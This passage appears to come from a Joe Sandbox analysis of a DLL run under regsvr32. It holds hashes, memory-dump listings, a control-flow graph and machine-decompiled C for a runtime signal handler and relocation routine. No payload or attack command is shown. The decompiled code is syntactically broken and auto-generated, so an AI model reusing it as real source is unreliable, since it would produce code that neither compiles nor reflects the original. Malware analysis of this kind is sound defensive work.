                                                                                                                      • Instruction Fuzzy Hash: 5E3158B05583818B8348DF28D04A41ABBE0FBDD74CF804B1DF4CAAA2A0D738D655CB4B
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2c35a914b74522d3f67fec40b4bee07e27447b4ff2149b5ad5a167007b14cdfa
                                                                                                                      • Instruction ID: 4457a30fceed7efe4c454087a7b9cb3308906dead1ff0aef4dd9b7484eaee675
                                                                                                                      • Opcode Fuzzy Hash: 2c35a914b74522d3f67fec40b4bee07e27447b4ff2149b5ad5a167007b14cdfa
                                                                                                                      • Instruction Fuzzy Hash: 3721BF709587848BD358CF28C08A51BBFE1FBC5384F604A1DF5968A360D774D889CB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1710daedb81dfd00f28e2635c1f304200efc15f4e107109d13b45219be72ca40
                                                                                                                      • Instruction ID: 8b1e32b027c7c681c079de73f43f0cdda7ec1a0caa23a1cc2bea2c2f140901c1
                                                                                                                      • Opcode Fuzzy Hash: 1710daedb81dfd00f28e2635c1f304200efc15f4e107109d13b45219be72ca40
                                                                                                                      • Instruction Fuzzy Hash: 932146B55087858BC348DF28C58A41ABBE1FB9C348F414B2DF4DAAA260D7789605CB4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 496ee0284466fb55f7a9f63183da93d67e21baf12f8af7376bfcc43bc2e37e77
                                                                                                                      • Instruction ID: f6c0086bf9fb66903d9967eb5ed23ab19f6959629265641b3d1938cc0f1d446e
                                                                                                                      • Opcode Fuzzy Hash: 496ee0284466fb55f7a9f63183da93d67e21baf12f8af7376bfcc43bc2e37e77
                                                                                                                      • Instruction Fuzzy Hash: F5216DB0529781AFD788DF29D48991BBBE0FB99308F806A2DF88697250D370D455CB47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93e0bbb99453ea7132342a41d5e68cbcbdbaf92769f486498afaee62b9b8bdef
                                                                                                                      • Instruction ID: 1ddfb605a3f1c5ecb09827dc007ecc4896b2b70849c06f02ae57c41dc5cc3b62
                                                                                                                      • Opcode Fuzzy Hash: 93e0bbb99453ea7132342a41d5e68cbcbdbaf92769f486498afaee62b9b8bdef
                                                                                                                      • Instruction Fuzzy Hash: BF216B746187848BC349DF28D45941ABBE1FB8C71CF400B1DF4CAAA354D7B8E645CB4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdd339c76fbedce123d200fc44485f67912c8c5fd13d365c5e0b2635809a51a0
                                                                                                                      • Instruction ID: 59cebbf573bc484a77e806a9e85b043536aad459f4fe6839c8d1284ae1f27a0d
                                                                                                                      • Opcode Fuzzy Hash: cdd339c76fbedce123d200fc44485f67912c8c5fd13d365c5e0b2635809a51a0
                                                                                                                      • Instruction Fuzzy Hash: A4212BB56187848FC749DF28C45650BBBE0FB9D348F410B1DF4CAA6220D3799645CB4B
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9cdf929a385d2f6bf6cf4cf856b9c225f3682ddb6b3d0b145fe7146d9f3679b1
                                                                                                                      • Instruction ID: 6cdb095bd97baea91a8d3575e10c15239a773a04d639134f5409160e40372bc9
                                                                                                                      • Opcode Fuzzy Hash: 9cdf929a385d2f6bf6cf4cf856b9c225f3682ddb6b3d0b145fe7146d9f3679b1
                                                                                                                      • Instruction Fuzzy Hash: 50B0021651F7D016DB13877119A12582E724392840F8F84D7C29882697C08D141CD327
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 511 61a02470-61a0248c 512 61a02520-61a02524 511->512 513 61a02492-61a02497 511->513 512->513 516 61a0252a 512->516 514 61a024e0-61a024e5 513->514 515 61a02499-61a0249e 513->515 520 61a02540-61a02545 514->520 521 61a024e7 514->521 517 61a024a4 515->517 518 61a025d5-61a025d7 515->518 519 61a02530-61a0253b 516->519 522 61a02591-61a02596 517->522 523 61a024aa-61a024af 517->523 524 61a024ec-61a024fc signal 518->524 520->519 525 61a02547 520->525 521->524 522->519 526 61a02598-61a0259d 522->526 523->519 527 61a024b1-61a024b6 523->527 530 61a02610-61a02626 signal 524->530 531 61a02502-61a02505 524->531 528 61a025e0-61a025e5 525->528 529 61a0254d-61a02552 525->529 532 61a024c0-61a024ca 526->532 534 61a025a3-61a025b3 signal 526->534 527->521 535 61a024b8 527->535 528->534 536 61a025e7-61a025ec 528->536 529->519 537 61a02554-61a02559 529->537 538 61a02513-61a02519 530->538 539 61a0262c-61a02639 call 61a02ca0 530->539 531->532 533 61a02507-61a0250e 531->533 542 61a02600-61a02602 532->542 543 61a024d0-61a024d8 532->543 533->538 540 61a02660-61a0266f signal 534->540 541 61a025b9-61a025bc 534->541 535->532 536->532 544 61a025f2 536->544 537->532 545 61a0255f-61a0256f signal 537->545 539->538 541->532 548 61a025c2-61a025d4 541->548 542->538 543->514 544->519 549 61a02640-61a02654 signal 545->549 550 61a02575-61a02578 545->550 549->538 550->532 552 61a0257e-61a02590 550->552
                                                                                                                      C-Code - Quality: 61%
                                                                                                                      			E61A02470(intOrPtr* __rcx) {
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				signed int _t6;
                                                                                                                      				signed int _t37;
                                                                                                                      				void* _t40;
                                                                                                                      				signed int* _t51;
                                                                                                                      				void* _t53;
                                                                                                                      
                                                                                                                      				_t51 =  *((intOrPtr*)(__rcx));
                                                                                                                      				_t6 =  *_t51;
                                                                                                                      				if((_t6 & 0x20ffffff) == 0x20474343) {
                                                                                                                      					__eflags = _t51[1] & 0x00000001;
                                                                                                                      					if((_t51[1] & 0x00000001) != 0) {
                                                                                                                      						goto L1;
                                                                                                                      					} else {
                                                                                                                      						asm("o16 nop [eax+eax]");
                                                                                                                      						goto L17;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					L1:
                                                                                                                      					if(_t6 <= 0xc0000091) {
                                                                                                                      						if(_t6 < 0xc000008d) {
                                                                                                                      							__eflags = _t6 - 0xc0000008;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								if(__eflags > 0) {
                                                                                                                      									__eflags = _t6 - 0xc000001d;
                                                                                                                      									if(_t6 == 0xc000001d) {
                                                                                                                      										goto L27;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t6 - 0xc000008c;
                                                                                                                      										if(_t6 != 0xc000008c) {
                                                                                                                      											goto L7;
                                                                                                                      										}
                                                                                                                      										goto L17;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t6 - 0x80000002;
                                                                                                                      									if(_t6 == 0x80000002) {
                                                                                                                      										goto L17;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t6 - 0xc0000005;
                                                                                                                      										if(_t6 != 0xc0000005) {
                                                                                                                      											goto L7;
                                                                                                                      										}
                                                                                                                      										L61A02D80();
                                                                                                                      										__eflags = _t47 - 1;
                                                                                                                      										if(_t47 == 1) {
                                                                                                                      											L61A02D80();
                                                                                                                      											return 0xffffffff;
                                                                                                                      										}
                                                                                                                      										__eflags = _t47;
                                                                                                                      										if(_t47 == 0) {
                                                                                                                      											goto L7;
                                                                                                                      										}
                                                                                                                      										 *_t47();
                                                                                                                      										return 0xffffffff;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							goto L10;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						_t40 = _t6 - 0xc0000094;
                                                                                                                      						if(_t40 == 0) {
                                                                                                                      							_t37 = 0;
                                                                                                                      							goto L11;
                                                                                                                      						} else {
                                                                                                                      							if(_t40 > 0) {
                                                                                                                      								__eflags = _t6 - 0xc0000095;
                                                                                                                      								if(_t6 == 0xc0000095) {
                                                                                                                      									goto L17;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t6 - 0xc0000096;
                                                                                                                      									if(_t6 != 0xc0000096) {
                                                                                                                      										goto L7;
                                                                                                                      									}
                                                                                                                      									L27:
                                                                                                                      									L61A02D80();
                                                                                                                      									__eflags = _t47 - 1;
                                                                                                                      									if(_t47 == 1) {
                                                                                                                      										L61A02D80();
                                                                                                                      										return 0xffffffff;
                                                                                                                      									}
                                                                                                                      									__eflags = _t47;
                                                                                                                      									if(_t47 == 0) {
                                                                                                                      										goto L7;
                                                                                                                      									}
                                                                                                                      									 *_t47();
                                                                                                                      									return 0xffffffff;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t6 == 0xc0000092) {
                                                                                                                      									L17:
                                                                                                                      									return 0xffffffff;
                                                                                                                      								} else {
                                                                                                                      									if(_t6 != 0xc0000093) {
                                                                                                                      										L7:
                                                                                                                      										_t47 =  *0x61a08640;
                                                                                                                      										if( *0x61a08640 == 0) {
                                                                                                                      											return 0;
                                                                                                                      										}
                                                                                                                      										_t53 = _t53 + 0x38;
                                                                                                                      										goto __rax;
                                                                                                                      									}
                                                                                                                      									L10:
                                                                                                                      									_t37 = 1;
                                                                                                                      									L11:
                                                                                                                      									L61A02D80();
                                                                                                                      									if(_t47 != 1) {
                                                                                                                      										if(_t47 == 0) {
                                                                                                                      											goto L7;
                                                                                                                      										}
                                                                                                                      										 *_t47();
                                                                                                                      										return 0xffffffff;
                                                                                                                      									}
                                                                                                                      									L61A02D80();
                                                                                                                      									__eflags = _t37;
                                                                                                                      									if(_t37 != 0) {
                                                                                                                      										_v32 = 0xffffffff;
                                                                                                                      										E61A02CA0(0xffffffff);
                                                                                                                      										return _v32;
                                                                                                                      									}
                                                                                                                      									return 0xffffffff;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}









                                                                                                                      0x61a02547
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a02499
                                                                                                                      0x61a02499
                                                                                                                      0x61a0249e
                                                                                                                      0x61a025d5
                                                                                                                      0x00000000
                                                                                                                      0x61a024a4
                                                                                                                      0x61a024a4
                                                                                                                      0x61a02591
                                                                                                                      0x61a02596
                                                                                                                      0x00000000
                                                                                                                      0x61a02598
                                                                                                                      0x61a02598
                                                                                                                      0x61a0259d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a025a3
                                                                                                                      0x61a025aa
                                                                                                                      0x61a025af
                                                                                                                      0x61a025b3
                                                                                                                      0x61a0266a
                                                                                                                      0x00000000
                                                                                                                      0x61a0266f
                                                                                                                      0x61a025b9
                                                                                                                      0x61a025bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a025c7
                                                                                                                      0x61a025d4
                                                                                                                      0x61a025d4
                                                                                                                      0x61a024aa
                                                                                                                      0x61a024af
                                                                                                                      0x61a02530
                                                                                                                      0x61a0253b
                                                                                                                      0x61a024b1
                                                                                                                      0x61a024b6
                                                                                                                      0x61a024c0
                                                                                                                      0x61a024c0
                                                                                                                      0x61a024ca
                                                                                                                      0x00000000
                                                                                                                      0x61a02600
                                                                                                                      0x61a024d3
                                                                                                                      0x61a024d9
                                                                                                                      0x61a024d9
                                                                                                                      0x61a024e7
                                                                                                                      0x61a024e7
                                                                                                                      0x61a024ec
                                                                                                                      0x61a024f3
                                                                                                                      0x61a024fc
                                                                                                                      0x61a02505
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a0250c
                                                                                                                      0x00000000
                                                                                                                      0x61a0250e
                                                                                                                      0x61a0261a
                                                                                                                      0x61a0261f
                                                                                                                      0x61a02626
                                                                                                                      0x61a0262c
                                                                                                                      0x61a02630
                                                                                                                      0x00000000
                                                                                                                      0x61a02635
                                                                                                                      0x61a02519
                                                                                                                      0x61a02519
                                                                                                                      0x61a024af
                                                                                                                      0x61a024a4
                                                                                                                      0x61a0249e
                                                                                                                      0x61a02497

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: signal
                                                                                                                      • String ID: CCG
                                                                                                                      • API String ID: 1946981877-1584390748
                                                                                                                      • Opcode ID: 3fcbe9189c4475978d5f3dda471f7602364b4de6d25be4949d1e7bd441f74494
                                                                                                                      • Instruction ID: 408c87e3ce2834711b7e332f7442ff1a7854ea90cf7461c733e8ded45a0d6a36
                                                                                                                      • Opcode Fuzzy Hash: 3fcbe9189c4475978d5f3dda471f7602364b4de6d25be4949d1e7bd441f74494
                                                                                                                      • Instruction Fuzzy Hash: 9C319031A4570046FA651EB8B86036925119B8933EF2EC727CE3E873E1EA2ED8C54255
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 42%
                                                                                                                      			E61A01C20(int __eax, void* __ebx, void* __rax, void* __rbx, signed char* __rcx, void* __rdi, void* __rsi, signed long long __r8, signed int __r9, void* __r12) {
                                                                                                                      				void* _v40;
                                                                                                                      				char _v44;
                                                                                                                      				signed long long _v56;
                                                                                                                      				void* _v80;
                                                                                                                      				char _v104;
                                                                                                                      				int _t43;
                                                                                                                      				char _t47;
                                                                                                                      				long _t48;
                                                                                                                      				void* _t49;
                                                                                                                      				signed int _t60;
                                                                                                                      				void* _t61;
                                                                                                                      				void* _t63;
                                                                                                                      				signed int* _t71;
                                                                                                                      				intOrPtr* _t73;
                                                                                                                      				signed int _t74;
                                                                                                                      				long long _t75;
                                                                                                                      				signed int _t78;
                                                                                                                      				void* _t80;
                                                                                                                      				signed char* _t81;
                                                                                                                      				signed int _t113;
                                                                                                                      				void* _t118;
                                                                                                                      
                                                                                                                      				_t115 = __r12;
                                                                                                                      				_t113 = __r9;
                                                                                                                      				_t106 = __r8;
                                                                                                                      				_t90 = __rdi;
                                                                                                                      				_t81 = __rcx;
                                                                                                                      				_t63 = __rax;
                                                                                                                      				_t43 = __eax;
                                                                                                                      				_push(__r12);
                                                                                                                      				_push(__rdi);
                                                                                                                      				_push(__rsi);
                                                                                                                      				_push(__rbx);
                                                                                                                      				r12d =  *0x61a08080;
                                                                                                                      				if(r12d == 0) {
                                                                                                                      					 *0x61a08080 = 1;
                                                                                                                      					E61A02A10(__eflags);
                                                                                                                      					_t43 = E61A02CB0(_t63);
                                                                                                                      					_t78 = 0x61a052b0;
                                                                                                                      					 *0x61a08090 = 0;
                                                                                                                      					 *0x61a08088 =  &_v104;
                                                                                                                      					__eflags = 0x61a052b0 - 7;
                                                                                                                      					if(0x61a052b0 <= 7) {
                                                                                                                      						goto L1;
                                                                                                                      					} else {
                                                                                                                      						__eflags = 0 - 0xb;
                                                                                                                      						if(0 <= 0xb) {
                                                                                                                      							L17:
                                                                                                                      							r9d =  *_t78;
                                                                                                                      							__eflags = r9d;
                                                                                                                      							if(r9d != 0) {
                                                                                                                      								goto L6;
                                                                                                                      							} else {
                                                                                                                      								r8d =  *(_t78 + 4);
                                                                                                                      								__eflags = r8d;
                                                                                                                      								if(r8d != 0) {
                                                                                                                      									goto L6;
                                                                                                                      								} else {
                                                                                                                      									goto L19;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							_t60 =  *0x61a052b0; // 0x0
                                                                                                                      							__eflags = _t60;
                                                                                                                      							if(_t60 != 0) {
                                                                                                                      								L6:
                                                                                                                      								__eflags = _t78 - 0x61a052b0;
                                                                                                                      								if(_t78 >= 0x61a052b0) {
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									do {
                                                                                                                      										r8d = 4;
                                                                                                                      										_t81 =  &(_t81[0x61a00000]);
                                                                                                                      										_t47 =  *_t81 +  *_t78;
                                                                                                                      										_t78 = _t78 + 8;
                                                                                                                      										_v44 = _t47;
                                                                                                                      										_t43 = L61A01AB0(_t47, _t78, _t81,  &_v44, 0x61a00000, 0x61a052b0, _t106, _t115, _t118);
                                                                                                                      										__eflags = _t78 - 0x61a052b0;
                                                                                                                      									} while (_t78 < 0x61a052b0);
                                                                                                                      									goto L9;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								r11d =  *0x61a052b4; // 0x0
                                                                                                                      								__eflags = r11d;
                                                                                                                      								if(r11d == 0) {
                                                                                                                      									r10d =  *0x61a052b8; // 0x0
                                                                                                                      									__eflags = r10d;
                                                                                                                      									if(r10d != 0) {
                                                                                                                      										L19:
                                                                                                                      										__eflags =  *(_t78 + 8) - 1;
                                                                                                                      										if( *(_t78 + 8) != 1) {
                                                                                                                      											L48:
                                                                                                                      											_t49 = E61A01A40(_t43, _t78, "  Unknown pseudo relocation protocol version %d.\n", _t86, _t90, 0x61a052b0, _t106, _t113, _t115, _t118);
                                                                                                                      											0;
                                                                                                                      											0;
                                                                                                                      											_t73 =  *0x61a04c00; // 0x61a03328
                                                                                                                      											_t74 =  *_t73;
                                                                                                                      											__eflags = _t74;
                                                                                                                      											while(_t74 != 0) {
                                                                                                                      												_t49 =  *_t74();
                                                                                                                      												_t75 =  *0x61a04c00; // 0x61a03328
                                                                                                                      												_t41 = _t75 + 8; // 0x61a03330
                                                                                                                      												_t42 = _t75 + 8; // 0x0
                                                                                                                      												_t74 =  *_t42;
                                                                                                                      												 *0x61a04c00 = _t41;
                                                                                                                      												__eflags = _t74;
                                                                                                                      											}
                                                                                                                      											return _t49;
                                                                                                                      										} else {
                                                                                                                      											_t80 = _t78 + 0xc;
                                                                                                                      											__eflags = _t80 - 0x61a052b0;
                                                                                                                      											if(_t80 < 0x61a052b0) {
                                                                                                                      												do {
                                                                                                                      													r8d =  *(_t80 + 8);
                                                                                                                      													_t43 = r8b & 0xffffffff;
                                                                                                                      													_t86 = _t86 + 0x61a00000;
                                                                                                                      													_t81 =  &(_t81[0x61a00000]);
                                                                                                                      													__eflags = _t43 - 0x10;
                                                                                                                      													_t113 =  *_t86;
                                                                                                                      													if(__eflags == 0) {
                                                                                                                      														r8d =  *_t81 & 0x0000ffff;
                                                                                                                      														__eflags = r8d & 0x00008000;
                                                                                                                      														if((r8d & 0x00008000) == 0) {
                                                                                                                      															goto L35;
                                                                                                                      														} else {
                                                                                                                      															_t106 = (_t106 | 0xffff0000) - _t86 + _t113;
                                                                                                                      															__eflags = _t106;
                                                                                                                      															_v56 = _t106;
                                                                                                                      															goto L34;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														if(__eflags > 0) {
                                                                                                                      															L26:
                                                                                                                      															__eflags = _t43 - 0x20;
                                                                                                                      															if(_t43 == 0x20) {
                                                                                                                      																r8d =  *_t81;
                                                                                                                      																__eflags = r8d & 0x80000000;
                                                                                                                      																if((r8d & 0x80000000) == 0) {
                                                                                                                      																	goto L35;
                                                                                                                      																} else {
                                                                                                                      																	_t106 = (_t106 | 0x00000000) - _t86 + _t113;
                                                                                                                      																	__eflags = _t106;
                                                                                                                      																	_v56 = _t106;
                                                                                                                      																	goto L41;
                                                                                                                      																}
                                                                                                                      															} else {
                                                                                                                      																__eflags = _t43 - 0x40;
                                                                                                                      																if(_t43 != 0x40) {
                                                                                                                      																	goto L25;
                                                                                                                      																} else {
                                                                                                                      																	_t113 = _t113 - _t86 +  *_t81;
                                                                                                                      																	__eflags = _t113;
                                                                                                                      																	_v56 = _t113;
                                                                                                                      																	goto L29;
                                                                                                                      																}
                                                                                                                      															}
                                                                                                                      														} else {
                                                                                                                      															__eflags = _t43 - 8;
                                                                                                                      															if(_t43 == 8) {
                                                                                                                      																r8d =  *_t81 & 0x000000ff;
                                                                                                                      																__eflags = r8b & 0x00000080;
                                                                                                                      																if((r8b & 0x00000080) == 0) {
                                                                                                                      																	L35:
                                                                                                                      																	_t106 = _t106 - _t86;
                                                                                                                      																	_t113 = _t113 + _t106;
                                                                                                                      																	__eflags = _t43 - 0x10;
                                                                                                                      																	_v56 = _t113;
                                                                                                                      																	if(__eflags == 0) {
                                                                                                                      																		L34:
                                                                                                                      																		_t86 =  &_v56;
                                                                                                                      																		r8d = 2;
                                                                                                                      																		_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
                                                                                                                      																	} else {
                                                                                                                      																		if(__eflags > 0) {
                                                                                                                      																			__eflags = _t43 - 0x20;
                                                                                                                      																			if(_t43 == 0x20) {
                                                                                                                      																				L41:
                                                                                                                      																				_t86 =  &_v56;
                                                                                                                      																				r8d = 4;
                                                                                                                      																				_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
                                                                                                                      																			} else {
                                                                                                                      																				__eflags = _t43 - 0x40;
                                                                                                                      																				if(_t43 == 0x40) {
                                                                                                                      																					L29:
                                                                                                                      																					_t86 =  &_v56;
                                                                                                                      																					r8d = 8;
                                                                                                                      																					_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
                                                                                                                      																				}
                                                                                                                      																			}
                                                                                                                      																		} else {
                                                                                                                      																			__eflags = _t43 - 8;
                                                                                                                      																			if(_t43 == 8) {
                                                                                                                      																				goto L38;
                                                                                                                      																			}
                                                                                                                      																		}
                                                                                                                      																	}
                                                                                                                      																} else {
                                                                                                                      																	_t106 = (_t106 | 0xffffff00) - _t86 + _t113;
                                                                                                                      																	_v56 = _t106;
                                                                                                                      																	L38:
                                                                                                                      																	_t86 =  &_v56;
                                                                                                                      																	r8d = 1;
                                                                                                                      																	_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
                                                                                                                      																}
                                                                                                                      															} else {
                                                                                                                      																L25:
                                                                                                                      																_t81 = "  Unknown pseudo relocation bit size %d.\n";
                                                                                                                      																_v56 = 0;
                                                                                                                      																_t43 = E61A01A40(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, _t113, 0, _t118);
                                                                                                                      																goto L26;
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      													_t80 = _t80 + 0xc;
                                                                                                                      													__eflags = _t80 - 0x61a052b0;
                                                                                                                      												} while (_t80 < 0x61a052b0);
                                                                                                                      												L9:
                                                                                                                      												__eflags =  *0x61a08090;
                                                                                                                      												if( *0x61a08090 > 0) {
                                                                                                                      													_t61 = 0;
                                                                                                                      													_t115 = VirtualQuery;
                                                                                                                      													_t90 = VirtualProtect;
                                                                                                                      													do {
                                                                                                                      														_t71 = _t78 +  *0x61a08088;
                                                                                                                      														__eflags =  *_t71;
                                                                                                                      														if( *_t71 == 0) {
                                                                                                                      															goto L11;
                                                                                                                      														} else {
                                                                                                                      															r8d = 0x30;
                                                                                                                      															_t86 =  &_v104;
                                                                                                                      															_t48 = VirtualQuery(??, ??, ??);
                                                                                                                      															__eflags = _t71;
                                                                                                                      															if(_t71 == 0) {
                                                                                                                      																_t78 = _t78 +  *0x61a08088;
                                                                                                                      																__eflags = _t78;
                                                                                                                      																_t106 =  *(_t78 + 8);
                                                                                                                      																_t43 = E61A01A40(_t48, _t78, "  VirtualQuery failed for %d bytes at address %p",  &_v104, _t90, 0x61a052b0,  *(_t78 + 8), _t113, _t115, _t118);
                                                                                                                      																goto L48;
                                                                                                                      															} else {
                                                                                                                      																_t113 =  &_v44;
                                                                                                                      																r8d =  *( *0x61a08088 + _t78);
                                                                                                                      																_t43 = VirtualProtect(??, ??, ??, ??);
                                                                                                                      																goto L11;
                                                                                                                      															}
                                                                                                                      														}
                                                                                                                      														goto L51;
                                                                                                                      														L11:
                                                                                                                      														_t61 = _t61 + 1;
                                                                                                                      														_t78 = _t78 + 0x18;
                                                                                                                      														__eflags = _t61 -  *0x61a08090;
                                                                                                                      													} while (_t61 <  *0x61a08090);
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_t78 = 0x61a052bc;
                                                                                                                      										goto L17;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									goto L6;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					L1:
                                                                                                                      					return _t43;
                                                                                                                      				}
                                                                                                                      				L51:
                                                                                                                      			}
























                                                                                                                      0x61a01f50
                                                                                                                      0x61a01f54
                                                                                                                      0x61a01f5b
                                                                                                                      0x61a01f5b
                                                                                                                      0x61a01f64
                                                                                                                      0x61a01db5
                                                                                                                      0x61a01db5
                                                                                                                      0x61a01db9
                                                                                                                      0x61a01dbc
                                                                                                                      0x61a01dd3
                                                                                                                      0x61a01dd8
                                                                                                                      0x61a01ddc
                                                                                                                      0x61a01de0
                                                                                                                      0x61a01de3
                                                                                                                      0x61a01de6
                                                                                                                      0x61a01de9
                                                                                                                      0x61a01dec
                                                                                                                      0x61a01e46
                                                                                                                      0x61a01e4a
                                                                                                                      0x61a01e51
                                                                                                                      0x00000000
                                                                                                                      0x61a01e53
                                                                                                                      0x61a01e5d
                                                                                                                      0x61a01e5d
                                                                                                                      0x61a01e60
